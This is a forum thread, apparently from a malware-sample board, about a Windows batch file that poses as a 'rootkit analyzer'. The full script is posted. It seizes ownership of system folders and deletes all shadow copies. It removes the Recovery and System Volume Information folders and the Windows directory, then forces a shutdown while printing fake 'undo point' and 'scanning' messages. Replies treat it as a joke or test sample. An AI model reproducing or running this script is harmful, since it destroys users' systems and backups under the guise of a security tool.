[Windows]

Cruelsister's rootkit analyzer:

Destroys system files and disables the computers repair function.
Password: XXX
Thanks cruelsister from malwaretips for this sample.

https://www.virustotal.com/en/file/11a1 ... 391083455/

[EP_X0FF]

Code: Select all

 @echo off
echo Cruelsister's Rootkit Magic. Creating UnDo Point
takeown /f c:\* >nul 2>nul
takeown /f %windir%\* >nul 2>nul
takeown /f %windir%\system32 >nul 2>nul
takeown /f %windir%\system32\* >nul 2>nul
takeown /f %windir%\system32\drivers >nul 2>nul
takeown /f %windir%\system32\drivers\*  >nul 2>nul
takeown /f c:\recovery >nul 2>nul
takeown /f c:\recovery\* >nul 2>nul
takeown /f c:\perflogs >nul 2>nul
takeown /f c:\perflogs\* >nul 2>nul
takeown /f "c:\system volume information\" >nul 2>nul
takeown /f "c:\system volume information\*" >nul 2>nul

icacls c:\* /grant administrators:f /t >nul 2>nul
icacls %windir% /grant administrators:f /t >nul 2>nul
icacls %windir%\* /grant administrators:f /t >nul 2>nul
icacls %windir%\system32 /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\* /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\drivers /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\drivers\* /grant administrators:f /t >nul 2>nul
icacls c:\recovery /grant administrators:f /t >nul 2>nul
icacls c:\recovery\* /grant administrators:f /t >nul 2>nul
icacls c:\perflogs /grant administrators:f /t >nul 2>nul
icacls c:\perflogs\* /grant administrators:f /t >nul 2>nul
icacls "c:\system volume information\" /grant administrators:f /t >nul 2>nul
icacls "c:\system volume information\*" /grant administrators:f /t >nul 2>nul

echo Scanning for Infection. Please Wait...
vssadmin delete shadows /All /Quiet >nul 2>nul 
vssadmin delete shadows /All /Quiet >nul 2>nul 
rmdir c:\PrefLogs /s /q >nul 2>nul 
rmdir c:\Recovery /s /q >nul 2>nul
rmdir "C:\System Volume Information" /s /q >nul 2>nul
rmdir c:\Windows /s /q >nul 2>nul

shutdown /s  /f /t 06 /c "All Done! Hope you like the Results!!"
exit

[colbyiscute4e]

It's its own rootkit but doesn't analyze it's self :D

[Win32:Virut]

This was just made for antivirus tests, not a real malware.

[EP_X0FF]

It is comedy section of course. Just like Viktor Antivirus Cleaner.

[TETYYSs]

It is comedy section of course. Just like Viktor Antivirus Cleaner.

So wait, Viktor Antivirus cleaner was fake?

[nullptr]

So wait, Viktor Antivirus cleaner was fake?

Code: Select all

ECHO * VIKTOR CLEANER 1.2 * is great
ECHO * So is Stuxnet Cleaner
ECHO * Genius at work! :S

[TETYYSs]

So wait, Viktor Antivirus cleaner was fake?

Code: Select all

ECHO * VIKTOR CLEANER 1.2 * is great
ECHO * So is Stuxnet Cleaner
ECHO * Genius at work! :S

Didn't it use KPH to remove them?

[EP_X0FF]

Didn't it use KPH to remove them?

Here is dedicated topic in deserved subforum.